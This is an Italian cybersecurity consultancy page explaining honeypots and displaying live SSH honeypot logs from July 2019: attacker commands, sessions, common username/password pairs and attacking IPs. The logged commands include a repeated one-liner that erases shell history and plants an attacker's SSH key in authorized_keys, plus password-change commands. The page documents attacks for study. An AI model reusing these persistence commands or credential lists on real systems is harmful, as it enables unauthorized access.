ENG ITA Ottieni un preventivo

# Ethical Hacking & Cyber Security services

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

SSH

×
Last 50 commands executed
DateCommandSource
2019-07-24 07:02:51uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd104.248.255.118 United States
2019-07-24 06:19:45uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd74.63.232.2 United States
2019-07-24 06:17:35uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd152.115.50.82 Denmark
2019-07-24 03:58:16uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd109.110.52.77 Russian Federation
2019-07-24 03:55:43lscpu | grep Model59.13.139.46 Korea, Republic of
2019-07-24 03:55:37uname -a59.13.139.46 Korea, Republic of
2019-07-24 03:55:31uname59.13.139.46 Korea, Republic of
2019-07-24 03:55:25top59.13.139.46 Korea, Republic of
2019-07-24 03:55:20nproc59.13.139.46 Korea, Republic of
2019-07-24 03:55:20nproc59.13.139.46 Korea, Republic of
2019-07-24 03:55:14uname -m59.13.139.46 Korea, Republic of
2019-07-24 03:55:09w59.13.139.46 Korea, Republic of
2019-07-24 03:55:00crontab -l59.13.139.46 Korea, Republic of
2019-07-24 03:54:55ls -lh $(which ls)59.13.139.46 Korea, Republic of
2019-07-24 03:54:55which ls59.13.139.46 Korea, Republic of
2019-07-24 03:54:49free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'59.13.139.46 Korea, Republic of
2019-07-24 03:54:49free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}59.13.139.46 Korea, Republic of
2019-07-24 03:54:41cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'59.13.139.46 Korea, Republic of
2019-07-24 03:54:41cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}59.13.139.46 Korea, Republic of
2019-07-24 03:54:36echo -e "pass1234\\nW#hW3lsGAWJM\\nW#hW3lsGAWJM"|passwd|bash59.13.139.46 Korea, Republic of
2019-07-24 03:54:36Enter new UNIX password: 59.13.139.46 Korea, Republic of
2019-07-24 03:54:30cat /proc/cpuinfo | grep name | wc -l59.13.139.46 Korea, Republic of
2019-07-24 03:40:57lscpu | grep Model92.141.137.152 France
2019-07-24 03:40:52uname -a92.141.137.152 France
2019-07-24 03:40:47uname92.141.137.152 France
2019-07-24 03:40:42top92.141.137.152 France
2019-07-24 03:40:30nproc92.141.137.152 France
2019-07-24 03:40:30nproc92.141.137.152 France
2019-07-24 03:40:25uname -m92.141.137.152 France
2019-07-24 03:40:20w92.141.137.152 France
2019-07-24 03:40:15crontab -l92.141.137.152 France
2019-07-24 03:40:07ls -lh $(which ls)92.141.137.152 France
2019-07-24 03:40:07which ls92.141.137.152 France
2019-07-24 03:40:02free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'92.141.137.152 France
2019-07-24 03:40:02free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}92.141.137.152 France
2019-07-24 03:39:57cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'92.141.137.152 France
2019-07-24 03:39:57cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}92.141.137.152 France
2019-07-24 03:39:52echo -e "asd\\no-viNJH4J8bD\\no-viNJH4J8bD"|passwd|bash92.141.137.152 France
2019-07-24 03:39:52Enter new UNIX password: 92.141.137.152 France
2019-07-24 03:39:47cat /proc/cpuinfo | grep name | wc -l92.141.137.152 France
2019-07-24 02:48:10uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd165.227.124.229 United States
2019-07-24 02:25:45uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd206.189.94.158 United States
2019-07-24 02:22:44uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd51.91.36.96 France
2019-07-24 02:06:13uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd180.76.97.86 China
2019-07-24 02:01:50uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd36.66.149.211 Indonesia
2019-07-24 01:50:33lscpu | grep Model138.68.140.76 United Kingdom
2019-07-24 01:50:29uname -a138.68.140.76 United Kingdom
2019-07-24 01:50:23uname138.68.140.76 United Kingdom
2019-07-24 01:50:18top138.68.140.76 United Kingdom
2019-07-24 01:50:13cat /proc/cpuinfo | grep model | grep name | wc -l138.68.140.76 United Kingdom
×
Last 20 sessions
DateSource
2019-07-24 09:15:43134.19.187.75 Netherlands
2019-07-24 09:15:405.188.86.206 Ireland
2019-07-24 09:15:385.188.87.52 Russian Federation
2019-07-24 09:15:25134.19.187.75 Netherlands
2019-07-24 09:15:205.188.86.207 Ireland
2019-07-24 09:15:145.188.86.164 Ireland
2019-07-24 09:15:095.188.86.167 Ireland
2019-07-24 09:14:595.188.87.55 Russian Federation
2019-07-24 09:14:485.188.86.196 Ireland
2019-07-24 09:14:435.188.87.49 Russian Federation
2019-07-24 09:14:365.188.86.169 Ireland
2019-07-24 09:14:345.188.86.211 Ireland
2019-07-24 09:14:295.188.86.207 Ireland
2019-07-24 09:14:05134.19.187.75 Netherlands
2019-07-24 09:14:035.188.86.167 Ireland
2019-07-24 09:14:015.188.87.52 Russian Federation
2019-07-24 09:13:55185.220.221.208 Czech Republic
2019-07-24 09:13:495.188.86.164 Ireland
2019-07-24 09:13:485.188.86.206 Ireland
2019-07-24 09:13:425.188.87.55 Russian Federation
×
TOP 15 USER+PASS
CountUsernamePassword
1873829 adminadmin123
13790 rootchangeme
5320 admin
3262 adminaerohive
1323 ubntubnt
1304 adminadmin
1202 111111admin
1200 adm12345678
645 12341234
622 adamadam
619 aa
617 admadm
616 accacc
615 adm123456
610 123123
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
797965.188.86.211 Ireland
594845.188.87.55 Russian Federation
5813588.214.26.88
578775.188.87.51 Russian Federation
573345.188.87.49 Russian Federation
567765.188.87.53 Russian Federation
5627288.214.26.89
556735.188.87.52 Russian Federation
550815.188.86.194 Ireland
550545.188.87.54 Russian Federation
538275.188.86.169 Ireland
534465.188.86.165 Ireland
526875.188.86.208 Ireland
525735.188.86.167 Ireland
52466134.19.187.75 Netherlands
524425.188.86.210 Ireland
520505.188.86.197 Ireland
512135.188.86.170 Ireland
50666185.220.221.203 Czech Republic
506245.188.86.195 Ireland
×
TOP 20 attackers
ConnectionsSource
798545.188.86.211 Ireland
595185.188.87.55 Russian Federation
5906188.214.26.88
578905.188.87.51 Russian Federation
573495.188.87.49 Russian Federation
5716288.214.26.89
567865.188.87.53 Russian Federation
557155.188.87.52 Russian Federation
551235.188.86.194 Ireland
550825.188.87.54 Russian Federation
538855.188.86.169 Ireland
535295.188.86.165 Ireland
527535.188.86.208 Ireland
526255.188.86.167 Ireland
52545134.19.187.75 Netherlands
525185.188.86.210 Ireland
521045.188.86.197 Ireland
512625.188.86.170 Ireland
50692185.220.221.203 Czech Republic
506715.188.86.195 Ireland

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!